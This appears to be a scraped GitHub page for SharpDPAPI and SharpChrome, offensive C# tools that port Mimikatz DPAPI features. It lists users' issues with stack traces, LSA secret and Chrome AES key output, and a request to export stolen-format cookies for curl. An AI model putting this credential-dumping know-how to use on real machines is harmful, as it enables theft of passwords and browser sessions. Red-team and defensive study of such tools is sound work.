ghostpack / sharpdpapi Goto Github PK

View Code? Open in Web Editor NEW

1.1K 1.1K 208.0 1.57 MB

SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.

License: Other

C# 100.00%

sharpdpapi's People

Contributors

Stargazers

Watchers

Forkers

nickhakkz h0k5 vaginessa dannymas raystyle atropineal mmg1 orf53975 pateldisolution hookeyao leechristensen superdong0 ashr gavz killvxk khr0x40sh jack51706 bigrob69 dmb2168 modulexcite darkoperator attackgithub egypt attackdeveloper 02bx mrzzkllen a-min3 imulmul gkforfun mr-b0b aolibaigei sry309 mabangde tquentin runonceex adzbtgb slooppe digitalarche marciopocebon red-infosec martiningesen securelogon deadmanindia superuser5 5l1v3r1 tnkr hayasec bh2uol xinyuweb freeide shantanu561993 tmalgherini johnwalk61 ykankaya exfiltrate selfevo peterg75 mfaerevaag lunarobliq eduardoromo devkw anna-q wisdark 3v1lw1th1n whoamisysteminfo h1d3r devbabygo hanbei-undying burnafterr3ad miragexy gh0st0ne bigbrobro l1ves curtishoughton nosorry askyeye zhouzu cyb3rk33p3r zha0 msf-ntdll nasa03 ridter sushi-sec dekoder leomatias sashka3076 sharadkhare pafh99 sparkns scriptidiot re-expoc jahawkins 3453-315h brurein fdlucifer shadowce gysf666 cutff fluxay123 madusec

sharpdpapi's Issues

Blob command with {GUID}:SHA1 passed on command line fails

The blob command fails when passed a {GUID}:SHA1 string. If the same key-value pair is passed in a file with the /mkfile flag, it works as expected.

Crashes on Windows 11

hi, just grabbed the latest version and compiled it (release, not debug)
I get the below error on Windows 11 (23H2)

Text error:

C:\tools\SharpDPAPI\SharpDPAPI\bin\Release>whoami
nt authority\system

C:\tools\SharpDPAPI\SharpDPAPI\bin\Release>SharpDPAPI.exe machinetriage

  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.11.3


[*] Action: Machine DPAPI Credential, Vault, and Certificate Triage


[!] Unhandled SharpDPAPI exception:

System.Security.Cryptography.CryptographicException: The cipher mode specified requires that an initialization vector (IV) be used.
   at System.Security.Cryptography.CapiSymmetricAlgorithm.ProcessIV(Byte[] iv, Int32 blockSize, CipherMode cipherMode)
   at System.Security.Cryptography.CapiSymmetricAlgorithm..ctor(Int32 blockSize, Int32 feedbackSize, SafeCspHandle provider, SafeCapiKeyHandle key, Byte[] iv, CipherMode cipherMode, PaddingMode paddingMode, EncryptionMode encryptionMode)
   at System.Security.Cryptography.AesCryptoServiceProvider.CreateDecryptor(SafeCapiKeyHandle key, Byte[] iv)
   at SharpDPAPI.Crypto.LSAAESDecrypt(Byte[] key, Byte[] data)
   at SharpDPAPI.LSADump.GetLSAKey()
   at SharpDPAPI.LSADump.GetLSASecret(String secretName)
   at SharpDPAPI.LSADump.GetDPAPIKeys(Boolean show)
   at SharpDPAPI.Triage.TriageSystemMasterKeys(Boolean show)
   at SharpDPAPI.Commands.Machinetriage.Execute(Dictionary`2 arguments)
   at SharpDPAPI.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at SharpDPAPI.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)


SharpDPAPI completed in 00:00:00.0240340

Must be elevated to triage SYSTEM DPAPI Credentials!

Hello:
I compiled sharpchrome and works well.

I compiled sharpdpapi and when run commands give this:

C:\Users\TESTACCOUNT\Downloads\SharpDPAPI-master\SharpDPAPI-master\SharpDPAPI-master\SharpDPAPI\bin\Release>SharpDPAPI.exe machinevaults

(_ |_ . . ._ | \ |) /\ |) |
__) | | (| | |) |_/ | /--\ | |
|
v1.6.1

[*] Action: Machine DPAPI Vault Triage

[X] Must be elevated to triage SYSTEM DPAPI Credentials!

My AV (Avast) was disabled when doing compiled and also when running SharpDPAPI.exe machinevaults.

Any info much appreciated.

uPDATE:
I was running from VS developer cmd.

[!] Unhandled SharpDPAPI exception:

Hello:
When running sharpdpapi.exe I getting this:

C:\Users\TESTACCOUNT\Downloads\SharpDPAPI-master\SharpDPAPI-master\SharpDPAPI-master\SharpDPAPI\bin\Release>SharpDPAPI.exe machinevaults

(_ |_ . . ._ | \ |) /\ |) |
__) | | (| | |) |_/ | /--\ | |
|
v1.6.1

[*] Action: Machine DPAPI Vault Triage

[] Elevating to SYSTEM via token duplication for LSA secret retrieval
[] RevertToSelf()

[] Secret : DPAPI_SYSTEM
[] full: xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[*] m/u : xxxxxxxxxxxxxxxxxxxxxxx / xxxxxxxxxxxxxxxxxxxxxxxxxx

[!] Unhandled SharpDPAPI exception:

System.UnauthorizedAccessException: Access to the path 'C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{8bf0a20f-5420-11e9-ac9f-e84e06061855}.TM.blf' is denied.
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
at System.IO.File.InternalReadAllBytes(String path, Boolean checkHost)
at SharpDPAPI.Triage.TriageSystemMasterKeys(Boolean show)
at SharpDPAPI.Commands.Machinevaults.Execute(Dictionary2 arguments) at SharpDPAPI.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary2 arguments)
at SharpDPAPI.Program.Main(String[] args)

My sharpchrome.exe compiled run well.

Any info much appreciated.

Debugging Issue & Marshal.PtrToStructure() question

When debugging the SharpDPAPI with below config/flags, I had an questions on why the pointer is not showing in the correct address as the debugger says.

Then I realized it might be due to misdecleared variables within the Struct,

        public struct LSA_UNICODE_STRING : IDisposable
        {
            public ushort Length;
            public ushort MaximumLength;
            public ushort certLen;
            public IntPtr buffer;

            public LSA_UNICODE_STRING(string s)
            {
                Length = (ushort)(s.Length * 2);
                MaximumLength = (ushort)(Length + 2);
                certLen = (ushort)(Length + 2);
                buffer = Marshal.StringToHGlobalUni(s);
            }

            public void Dispose()
            {
                Marshal.FreeHGlobal(buffer);
                buffer = IntPtr.Zero;
            }

            public override string ToString()
            {
                return Marshal.PtrToStringUni(buffer);
            }
        }

which then I saw the ref to mimikatz header and added another declearation for certLen. And that matched with length appearing apperaing 3 times in the memory shown here

and stepping through.

But previously, it also worked just fine without the certLen. So I was wondering Does Marshal.PtrToStructure() in
Interop.LSA_UNICODE_STRING lusSecretData = (Interop.LSA_UNICODE_STRING)Marshal.PtrToStructure(PrivateData, typeof(Interop.LSA_UNICODE_STRING)); just magically finds the IntPtr in the memory of PrivateData which is really after the CertLen + 2 null bytes?

Sorry if im being confusing here.

SharpChrome Feature Request: Export Cookies as NetScape Cookie File

Hello Mate,

Loving SharpChrome and thanks for a wonderful project. I was wondering if the option to export cookies in the NetScape cookie format could be added? It's tab delimited and the syntax is cited here: https://www.hashbangcode.com/article/netscape-http-cooke-file-parser-php

The reason for the request is curl and wget can use this cookie format for requests, but not JSON.

Thanks for all the hard work.

Cheers,
Olly

Machinemasterkeys fails on some Recovery files

C:\>C:\tools\SharpDPAPI\SharpDPAPI\bin\Debug\SharpDPAPI.exe machinemasterkeys
  __                 _   _       _ ___
 (_  |_   _. ._ ._  | \ |_) /\  |_) |
 __) | | (_| |  |_) |_/ |  /--\ |  _|_
                |
  v1.6.1


[*] Action: Machine DPAPI Masterkey File Triage

[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()

[*] Secret  : DPAPI_SYSTEM
[*]    full: <snip>
[*]    m/u : <snip>


[!] Unhandled SharpDPAPI exception:

System.UnauthorizedAccessException: Access to the path 'C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{86283df8-8d88-4a51-957d-449ff1919746}.TM.blf' is denied.
   at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
   at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
   at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options, String msgPath, Boolean bFromProxy, Boolean useLongPath, Boolean checkHost)
   at System.IO.File.InternalReadAllBytes(String path, Boolean checkHost)
   at SharpDPAPI.Triage.TriageSystemMasterKeys(Boolean show) in C:\tools\SharpDPAPI\SharpDPAPI\lib\Triage.cs:line 161
   at SharpDPAPI.Commands.Machinemasterkeys.Execute(Dictionary`2 arguments) in C:\tools\SharpDPAPI\SharpDPAPI\Commands\Machinemasterkeys.cs:line 15
   at SharpDPAPI.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments) in C:\tools\SharpDPAPI\SharpDPAPI\Domain\CommandCollection.cs:line 46
   at SharpDPAPI.Program.Main(String[] args) in C:\tools\SharpDPAPI\SharpDPAPI\Program.cs:line 24

FullName                                                                                                                                     
--------                                                                                                                                     
C:\Windows\System32\Microsoft\Protect\Recovery                                                                                               
C:\Windows\System32\Microsoft\Protect\S-1-5-18                                                                                               
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat                                                                                  
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat.LOG1                                                                             
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat.LOG2                                                                             
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{440de6b5-c574-4468-b756-a0b8ea25fdc0}.TM.blf                                     
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{ea68be95-bae7-405a-8b69-51103f0bfa0d}.TMContainer00000000000000000001.regtrans-ms
C:\Windows\System32\Microsoft\Protect\Recovery\Recovery.dat{7c30ad6c-e65d-42c6-b7a6-04acffb7cb1f}.TMContainer00000000000000000002.regtrans-ms
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User                                                                                          
C:\Windows\System32\Microsoft\Protect\S-1-5-18\d60dafcc-6ea7-4d5c-a955-c2ab0e6017b6  
C:\Windows\System32\Microsoft\Protect\S-1-5-18\b32c164f-b24a-414b-98b5-0a6640eab86c                                                          
C:\Windows\System32\Microsoft\Protect\S-1-5-18\15c3da9d-e25c-41ff-97dc-449a0d7d58dd                                                          
C:\Windows\System32\Microsoft\Protect\S-1-5-18\Preferred                                                                                     
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\3700badb-931e-44b5-b3f5-ea3b232c32d6                                                     
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\1ede99f5-79b5-418f-9c40-20deb084e219                                                     
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\eff1de12-4bb7-4760-9dfe-e9626bef6405                                                     
C:\Windows\System32\Microsoft\Protect\S-1-5-18\User\Preferred

Cookie unprotect Not working with latest chrome version 104

Hi Will,
I think This command doesn't work anymore: SharpChrome.exe cookies /unprotect since the location of the cookie file is now C:\Users*\AppData\Local\Google\Chrome\User Data\Default\Network.

output taken From the BH2022 ATTA lab:

__                 _
(_  |_   _. ._ ._  /  |_  ._ _  ._ _   _
__) | | (_| |  |_) \_ | | | (_) | | | (/_
               |
 v1.11.1


[*] Action: Chrome Saved Cookies Triage

[*] Triaging non-expired cookies. Use '/showall' to display ALL cookies.

[*] Triaging Chrome Cookies for current user


[*] AES state key file : C:\Users\thor\AppData\Local\Google\Chrome\User Data\Local State
[*] AES state key      : 001B279C498A9BA70B76E301E45D7B2752475FEFA2690EAA17BAE06616489018

Fails to run SharpChrome when Chrome is open

Got error when Chrome is open.
Using SharpChrome v1.12.0, Windows 11, Google Chrome Version 122.0.6261.129

System.NullReferenceException: Object reference not set to an instance of an object.
   at SharpChrome.Chrome.ParseChromeCookies(Dictionary`2 MasterKeys, String cookieFilePath, String displayFormat, Boolean showAll, Boolean unprotect, String cookieRegex, String urlRegex, Boolean setneverexpire, Byte[] aesStateKey, Boolean quiet)
   at SharpChrome.Chrome.TriageChromeCookies(Dictionary`2 MasterKeys, String computerName, String userFolder, String displayFormat, Boolean showAll, Boolean unprotect, String cookieRegex, String urlRegex, Boolean setneverexpire, String stateKey, String browser, Boolean quiet)
   at SharpChrome.Commands.Cookies.Execute(Dictionary`2 arguments)
   at SharpChrome.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at SharpChrome.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)